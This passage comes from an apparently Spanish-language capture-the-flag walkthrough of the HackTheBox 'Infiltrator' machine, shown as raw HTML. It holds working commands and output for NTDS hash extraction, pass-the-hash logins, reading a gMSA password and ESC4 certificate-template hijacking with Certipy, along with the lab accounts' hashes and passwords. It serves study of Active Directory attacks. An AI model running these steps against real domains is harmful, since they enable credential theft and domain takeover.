class="m">2016</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>nla:True<span class="o">)</span> </span></span><span class="line"><span class="cl">RDP 10.10.11.31 <span class="m">3389</span> DC01 <span class="o">[</span>-<span class="o">]</span> infiltrator.htb<span class="se">\a</span>dministrator:7bf62b9c45112ffdadb7b6b4b9299dd2 <span class="o">(</span>STATUS_LOGON_FAILURE<span class="o">)</span> </span></span><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u administrator -H 7bf62b9c45112ffdadb7b6b4b9299dd2 </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>-<span class="o">]</span> infiltrator.htb<span class="se">\a</span>dministrator:7bf62b9c45112ffdadb7b6b4b9299dd2 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos netexec especificando el wordlist de usuarios y hashes pero unicamente se muestra valido l.clark.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u users.txt -H hashes_history --continue-on-success <span class="p">|</span> grep + </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>.clark:627a2cb0adc7ba12ea11174941b3da88 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="ntds-ntdsdotsqlite">NTDS ntdsdotsqlite</h2> <p>Ejecutamos <a href="https://github.com/almandin/ntdsdotsqlite">ntdsdotsqlite</a> especificando el archivo ntds, system y el output de la base de datos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ntdsdotsqlite ~/htb/infiltrator/download/<span class="s2">&#34;Active Directory&#34;</span>/ntds.dit --system ~/htb/infiltrator/download/registry/SYSTEM -o ~/htb/infiltrator/files/NTDS.sqlite </span></span><span class="line"><span class="cl">100%<span class="p">|</span>████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████<span class="p">|</span> 3823/3823 <span class="o">[</span>00:00&lt;00:00, 30751.81it/s<span class="o">]</span> </span></span><span class="line"><span class="cl">❯ file ~/htb/infiltrator/files/NTDS.sqlite </span></span><span class="line"><span class="cl">/home/kali/htb/infiltrator/files/NTDS.sqlite: SQLite 3.x database, last written using SQLite version 3046001, file counter 17, database pages 34, 1st free page 18, free pages 1, cookie 0x8, schema 4, UTF-8, version-valid-for <span class="m">17</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Siguiendo el <a href="https://github.com/almandin/ntdsdotsqlite/blob/main/sql_model.md">modelo</a> de la base de datos ejecutamos un query para obtener informacion.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="k">select</span> displayName, SPN, UPN, login, samaccountname, nthash, lmhash, ntPwdHistory, description from user_accounts<span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dentro de la descripcion de lan_managment se muestra lo que parece ser una contrasena.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ sqlite3 </span></span><span class="line"><span class="cl">SQLite version 3.46.1 2024-08-13 09:16:08 </span></span><span class="line"><span class="cl">Enter <span class="s2">&#34;.help&#34;</span> <span class="k">for</span> usage hints. </span></span><span class="line"><span class="cl">Connected to a transient in-memory database. </span></span><span class="line"><span class="cl">Use <span class="s2">&#34;.open FILENAME&#34;</span> to reopen on a persistent database. </span></span><span class="line"><span class="cl">sqlite&gt; .open NTDS.sqlite </span></span><span class="line"><span class="cl">sqlite&gt; .tables </span></span><span class="line"><span class="cl">containers groups trusted_domains </span></span><span class="line"><span class="cl">domain_dns machine_accounts user_accounts </span></span><span class="line"><span class="cl">domains organizational_units </span></span><span class="line"><span class="cl">sqlite&gt; <span class="k">select</span> displayName, SPN, UPN, login, samaccountname, nthash, lmhash, ntPwdHistory, description from user_accounts<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">||</span><span class="p">|</span>Administrator<span class="p">|</span>Administrator<span class="p">|</span>7bf62b9c45112ffdadb7b6b4b9299dd2<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[]</span><span class="p">|</span>Built-in account <span class="k">for</span> administering the computer/domain </span></span><span class="line"><span class="cl"><span class="o">||</span><span class="p">|</span>Guest<span class="p">|</span>Guest<span class="p">|</span>31d6cfe0d16ae931b73c59d7e0c089c0<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[]</span><span class="p">|</span>Built-in account <span class="k">for</span> guest access to the computer/domain </span></span><span class="line"><span class="cl"><span class="p">|</span><span class="o">[</span><span class="s2">&#34;kadmin/changepw&#34;</span><span class="o">]||</span>krbtgt<span class="p">|</span>krbtgt<span class="p">|</span>454fcbc37690c6e4628ab649e8e285a5<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;454fcbc37690c6e4628ab649e8e285a5&#34;</span><span class="o">]</span><span class="p">|</span>Key Distribution Center Service Account </span></span><span class="line"><span class="cl"><span class="o">||</span>winrm_svc@infiltrator.htb<span class="p">|</span>winrm_svc<span class="p">|</span>winrm_svc<span class="p">|</span>84287cd16341b91eb93a58456b73e30f<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;84287cd16341b91eb93a58456b73e30f&#34;</span><span class="o">]</span><span class="p">|</span>User Security and Management Specialist </span></span><span class="line"><span class="cl"><span class="o">||</span>lan_managment@infiltrator.htb<span class="p">|</span>lan_managment<span class="p">|</span>lan_managment<span class="p">|</span>e8ade553d9b0cb1769f429d897c92931<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;e8ade553d9b0cb1769f429d897c92931&#34;</span><span class="o">]</span><span class="p">|</span>l@n_M@an!1331 </span></span><span class="line"><span class="cl"><span class="o">||</span>harris@infiltrator.htb<span class="p">|</span>harris<span class="p">|</span>M.harris<span class="p">|</span>fc236589c448c620417b15597a3d3ca7<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;fc236589c448c620417b15597a3d3ca7&#34;</span><span class="o">]</span><span class="p">|</span>Head of Development Department </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">||</span>anderson@infiltrator.htb<span class="p">|</span>anderson<span class="p">|</span>D.anderson<span class="p">|</span>627a2cb0adc7ba12ea11174941b3da88<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;627a2cb0adc7ba12ea11174941b3da88&#34;</span><span class="o">]</span><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="o">||</span>clark@infiltrator.htb<span class="p">|</span>clark<span class="p">|</span>L.clark<span class="p">|</span>627a2cb0adc7ba12ea11174941b3da88<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;627a2cb0adc7ba12ea11174941b3da88&#34;</span><span class="o">]</span><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="o">||</span>martinez@infiltrator.htb<span class="p">|</span>martinez<span class="p">|</span>O.martinez<span class="p">|</span>eb86d7bcb30c8eac1bdcae5061e2dff4<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;eb86d7bcb30c8eac1bdcae5061e2dff4&#34;</span><span class="o">]</span><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="o">||</span>walker@infiltrator.htb<span class="p">|</span>walker<span class="p">|</span>A.walker<span class="p">|</span>46389d8dfdfcf0cbe262a71f576e574b<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;46389d8dfdfcf0cbe262a71f576e574b&#34;</span><span class="o">]</span><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="o">||</span>turner@infiltrator.htb<span class="p">|</span>turner<span class="p">|</span>K.turner<span class="p">|</span>48bcd1cdc870c6285376a990c2604531<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;48bcd1cdc870c6285376a990c2604531&#34;</span><span class="o">]</span><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="o">||</span>rodriguez@infiltrator.htb<span class="p">|</span>rodriguez<span class="p">|</span>E.rodriguez<span class="p">|</span>b1918c2ce6a62f4eee11c51b6e2e965a<span class="p">|</span>aad3b435b51404eeaad3b435b51404ee<span class="p">|</span><span class="o">[</span><span class="s2">&#34;b1918c2ce6a62f4eee11c51b6e2e965a&#34;</span><span class="o">]</span><span class="p">|</span> </span></span><span class="line"><span class="cl">sqlite&gt; </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">lan_managment : l@n_M@an!1331 </span></span></code></pre></td></tr></table> </div> </div><p>Verificamos que el par de credenciales son aceptadas para este usuario.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u lan_managment -p <span class="s1">&#39;l@n_M@an!1331&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>an_managment:l@n_M@an!1331 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---infiltrator_svc">User - infiltrator_svc</h1> <p>lan_managment puede realizar la lectura de la contrasena GMSA de infiltrator_svc$, logramos esto con netexec con la opcion <code>--gmsa</code>, donde observamos el hash NTLM de este usuario.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec ldap 10.10.11.31 -u lan_managment -p <span class="s1">&#39;l@n_M@an!1331&#39;</span> --gmsa </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\l</span>an_managment:l@n_M@an!1331 </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Getting GMSA Passwords </span></span><span class="line"><span class="cl">LDAP 10.10.11.31 <span class="m">389</span> DC01 Account: infiltrator_svc$ NTLM: 663675deae5af90402f1d53c8117cdaa PrincipalsAllowedToReadPassword: lan_managment </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="privesc">Privesc</h1> <h2 id="adcs">ADCS</h2> <p>infiltrator_svc$ pertenece al grupo Certificate Service DCOM Access.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20223282846.png" alt="image"></p> <p>Ejecutamos <a href="https://github.com/ly4k/Certipy">certipy</a> para busqueda de plantillas vulnerables. En este caso se muestra la plantilla <code>Infiltrator_Template</code> como vulnerable a <strong>ESC4</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ certipy find -vulnerable -u infiltrator_svc$ -hashes 663675deae5af90402f1d53c8117cdaa -dc-ip 10.10.11.31 -ns 10.10.11.31 -stdout </span></span><span class="line"><span class="cl">Certipy v5.0.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding issuance policies </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">15</span> issuance policies </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">0</span> OIDs linked to templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Retrieving CA configuration <span class="k">for</span> <span class="s1">&#39;infiltrator-DC01-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to connect to remote registry. Service should be starting now. Trying again... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully retrieved CA configuration <span class="k">for</span> <span class="s1">&#39;infiltrator-DC01-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Checking web enrollment <span class="k">for</span> CA <span class="s1">&#39;infiltrator-DC01-CA&#39;</span> @ <span class="s1">&#39;dc01.infiltrator.htb&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error checking web enrollment: timed out </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Use -debug to print a stacktrace </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : infiltrator-DC01-CA </span></span><span class="line"><span class="cl"> DNS Name : dc01.infiltrator.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>infiltrator-DC01-CA, <span class="nv">DC</span><span class="o">=</span>infiltrator, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149 </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2023-12-08 01:42:38+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2124-08-04 18:55:57+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment </span></span><span class="line"><span class="cl"> HTTP </span></span><span class="line"><span class="cl"> Enabled : False </span></span><span class="line"><span class="cl"> HTTPS </span></span><span class="line"><span class="cl"> Enabled : False </span></span><span class="line"><span class="cl"> User Specified SAN : Disabled </span></span><span class="line"><span class="cl"> Request Disposition : Issue </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Enabled </span></span><span class="line"><span class="cl"> Active Policy : CertificateAuthority_MicrosoftDefault.Policy </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Owner : INFILTRATOR.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> Access Rights </span></span><span class="line"><span class="cl"> ManageCa : INFILTRATOR.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> ManageCertificates : INFILTRATOR.HTB<span class="se">\A</span>dministrators </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Enroll : INFILTRATOR.HTB<span class="se">\A</span>uthenticated Users </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : Infiltrator_Template </span></span><span class="line"><span class="cl"> Display Name : Infiltrator_Template </span></span><span class="line"><span class="cl"> Certificate Authorities : infiltrator-DC01-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : True </span></span><span class="line"><span class="cl"> Certificate Name Flag : EnrolleeSuppliesSubject </span></span><span class="line"><span class="cl"> Enrollment Flag : IncludeSymmetricAlgorithms </span></span><span class="line"><span class="cl"> PendAllRequests </span></span><span class="line"><span class="cl"> PublishToDs </span></span><span class="line"><span class="cl"> Private Key Flag : ExportableKey </span></span><span class="line"><span class="cl"> Extended Key Usage : Smart Card Logon </span></span><span class="line"><span class="cl"> Server Authentication </span></span><span class="line"><span class="cl"> KDC Authentication </span></span><span class="line"><span class="cl"> Client Authentication </span></span><span class="line"><span class="cl"> Requires Manager Approval : True </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">1</span> </span></span><span class="line"><span class="cl"> Schema Version : <span class="m">2</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">99</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">650430</span> hours </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Template Created : 2025-05-27T06:05:56+00:00 </span></span><span class="line"><span class="cl"> Template Last Modified : 2025-05-27T06:05:57+00:00 </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : INFILTRATOR.HTB<span class="se">\L</span>ocal System </span></span><span class="line"><span class="cl"> Full Control Principals : INFILTRATOR.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\L</span>ocal System </span></span><span class="line"><span class="cl"> Write Owner Principals : INFILTRATOR.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\L</span>ocal System </span></span><span class="line"><span class="cl"> Write Dacl Principals : INFILTRATOR.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> INFILTRATOR.HTB<span class="se">\L</span>ocal System </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> User ACL Principals : INFILTRATOR.HTB<span class="se">\i</span>nfiltrator_svc </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC4 : User has dangerous permissions. </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="esc4-exploit">ESC4 Exploit</h2> <p>Realizamos la explotacion de <a href="https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc4-template-hijacking">ESC4</a> a esta plantilla iniciando con el cambio de configuracion a vulnerable.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ certipy template -u infiltrator_svc$ -hashes 663675deae5af90402f1d53c8117cdaa -dc-ip 10.10.11.31 -ns 10.10.11.31 -template <span class="s1">&#39;Infiltrator_Template&#39;</span> -write-default-configuration </span></span><span class="line"><span class="cl">Certipy v5.0.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving current configuration to <span class="s1">&#39;Infiltrator_Template.json&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Wrote current configuration <span class="k">for</span> <span class="s1">&#39;Infiltrator_Template&#39;</span> to <span class="s1">&#39;Infiltrator_Template.json&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating certificate template <span class="s1">&#39;Infiltrator_Template&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Replacing: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> nTSecurityDescriptor: b<span class="s1">&#39;\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> flags: <span class="m">66104</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKIDefaultKeySpec: <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKIKeyUsage: b<span class="s1">&#39;\x86\x00&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKIMaxIssuingDepth: -1 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKICriticalExtensions: <span class="o">[</span><span class="s1">&#39;2.5.29.19&#39;</span>, <span class="s1">&#39;2.5.29.15&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKIExpirationPeriod: b<span class="s1">&#39;\x00@9\x87.\xe1\xfe\xff&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKIOverlapPeriod: b<span class="s1">&#39;\x00\x80\xa6\n\xff\xde\xff\xff&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> pKIExtendedKeyUsage: <span class="o">[</span><span class="s1">&#39;1.3.6.1.5.5.7.3.2&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> msPKI-RA-Signature: <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> msPKI-Enrollment-Flag: <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> msPKI-Private-Key-Flag: <span class="m">16</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> msPKI-Certificate-Application-Policy: <span class="o">[</span><span class="s1">&#39;1.3.6.1.5.5.7.3.2&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">Are you sure you want to apply these changes to <span class="s1">&#39;Infiltrator_Template&#39;</span>? <span class="o">(</span>y/N<span class="o">)</span>: y </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;Infiltrator_Template&#39;</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Tras realizar el cambio obtuvimos el SID de Administrator.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span 